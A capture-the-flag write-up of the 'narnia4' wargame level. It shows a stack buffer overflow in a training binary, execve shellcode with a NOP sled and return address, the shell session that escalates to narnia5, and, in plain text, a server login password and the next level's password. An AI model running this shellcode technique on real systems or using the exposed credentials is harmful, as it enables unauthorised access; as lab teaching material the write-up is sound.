narnia4

Source: Internet  Editor: 程序博客网  Time: 2024/05/18 01:05
/** narnia4.c */
/*
    This program is free software; you can redistribute it and/or modify
    it under the terms of the GNU General Public License as published by
    the Free Software Foundation; either version 2 of the License, or
    (at your option) any later version.

    This program is distributed in the hope that it will be useful,
    but WITHOUT ANY WARRANTY; without even the implied warranty of
    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
    GNU General Public License for more details.

    You should have received a copy of the GNU General Public License
    along with this program; if not, write to the Free Software
    Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA  02110-1301  USA
*/
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <ctype.h>

extern char **environ;

int main(int argc, char **argv)
{
    int i;
    char buffer[256];

    /* wipe every environment string so nothing can be staged there */
    for (i = 0; environ[i] != NULL; i++)
        memset(environ[i], '\0', strlen(environ[i]));

    /* unchecked copy: an argv[1] of 256 bytes or more overflows buffer */
    if (argc > 1)
        strcpy(buffer, argv[1]);

    return 0;
}



/** nar.c */
#include <string.h>
#include <stdlib.h>
#include <stdio.h>
#include <ctype.h>

extern char **environ;

int main(int argc, char **argv)
{
    int i;
    char buffer[256];

    /* the only change from narnia4.c: print where buffer lives on the stack */
    printf("%p\n", buffer);

    for (i = 0; environ[i] != NULL; i++)
        memset(environ[i], '\0', strlen(environ[i]));

    if (argc > 1)
        strcpy(buffer, argv[1]);

    return 0;
}

Stack environment



The shellcode has to be placed in buffer, but buffer's address is unknown, so nar.c is used to work out buffer's address.

narnia4@melinda:/tmp/shadowcoder4$ gcc nar.c -o nar -m32 -z execstack -fno-stack-protector

narnia4@melinda:/tmp/shadowcoder4$ ./nar `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\x90" * 248 + "\xc8\xd3\xff\xff"'`
0xffffd3dc
Segmentation fault

narnia4@melinda:/tmp/shadowcoder4$ ./nar `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\x90" * 248 + "\xdc\xd3\xff\xff"'`
0xffffd3dc
$ exit

From this test we know that when the executable is ./nar, buffer's address is 0xffffd3dc.

Starting from 0xffffd3dc, we can then work out buffer's address when the executable is /narnia/narnia4.

The calculation is as follows:

./nar is 5 bytes long. As learned in narnia2, there are two fields before the environment variables that depend on argv[0], so that makes 10 bytes; main's frame is 16-byte aligned, so it rounds up to 16 bytes.

/narnia/narnia4 is 15 bytes long; the two argv[0]-dependent fields before the environment variables make 30 bytes; with main's 16-byte alignment that rounds up to 32 bytes.

So the buffer address of the program run as ./nar is 16 bytes higher than the buffer address of the program run as /narnia/narnia4.

Therefore the buffer address of the program run as /narnia/narnia4 is 0xffffd3cc.
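The argv[0] arithmetic above, together with a bounded copy that closes the strcpy hole, as an added C example that is not part of this write-up or the narnia sources; the function names are my own.

```c
#include <stdio.h>
#include <string.h>

/* Added example (not narnia4's code): the argv[0]-length arithmetic the
 * write-up uses, plus a length-checked replacement for the unchecked strcpy. */

/* The write-up counts two argv[0]-sized fields above main's frame and
 * rounds their total up to 16 bytes (main's stack alignment). */
static size_t argv0_footprint(const char *argv0)
{
    size_t raw = 2 * strlen(argv0);
    return (raw + 15) & ~(size_t)15;   /* round up to a multiple of 16 */
}

/* How many bytes lower buffer sits when the binary is invoked as `b`
 * instead of `a` (positive means a lower address). */
static long buffer_shift(const char *a, const char *b)
{
    return (long)argv0_footprint(b) - (long)argv0_footprint(a);
}

/* Hardened copy: refuse any argument that does not fit, NUL included.
 * Returns 0 on success, -1 if src would overflow dst. */
static int copy_arg_checked(char *dst, size_t dstsz, const char *src)
{
    size_t n = strlen(src);
    if (dstsz == 0 || n >= dstsz)
        return -1;                      /* 256 'A's do not fit buffer[256] */
    memcpy(dst, src, n + 1);
    return 0;
}

/* Helper: try to copy a constructed argument of n 'A's into a 256-byte buffer. */
static int try_copy_len(size_t n)
{
    char src[512], dst[256];
    if (n >= sizeof src)
        return -1;
    memset(src, 'A', n);
    src[n] = '\0';
    return copy_arg_checked(dst, sizeof dst, src);
}

int main(void)
{
    /* ./nar -> 16, /narnia/narnia4 -> 32: buffer lands 16 bytes lower */
    printf("shift = %ld\n", buffer_shift("./nar", "/narnia/narnia4"));
    printf("255 bytes: %d, 256 bytes: %d\n", try_copy_len(255), try_copy_len(256));
    return 0;
}
```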



root@yangq:~# ssh narnia4@178.79.134.250
narnia4@178.79.134.250's password: thaenohtai
narnia4@melinda:~$ cd /tmp/shadowcoder4
narnia4@melinda:/tmp/shadowcoder4$ ls
nar  nar.c  narnia4  narnia4.c  sleep.sh
narnia4@melinda:/tmp/shadowcoder4$ gcc nar.c -o nar -m32 -z execstack -fno-stack-protector
narnia4@melinda:/tmp/shadowcoder4$ ./nar `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\x90" * 248 + "\xc8\xd3\xff\xff"'`
0xffffd3dc
Segmentation fault
narnia4@melinda:/tmp/shadowcoder4$ ./nar `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\x90" * 248 + "\xdc\xd3\xff\xff"'`
0xffffd3dc
$ exit
narnia4@melinda:/tmp/shadowcoder4$ /narnia/narnia4 `python -c 'print "\x6a\x0b\x58\x31\xf6\x56\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x89\xca\xcd\x80" + "\x90" * 248 + "\xcc\xd3\xff\xff"'`
$ whoami
narnia5
$ cat /etc/narnia_pass/narnia5
faimahchiy
$ 

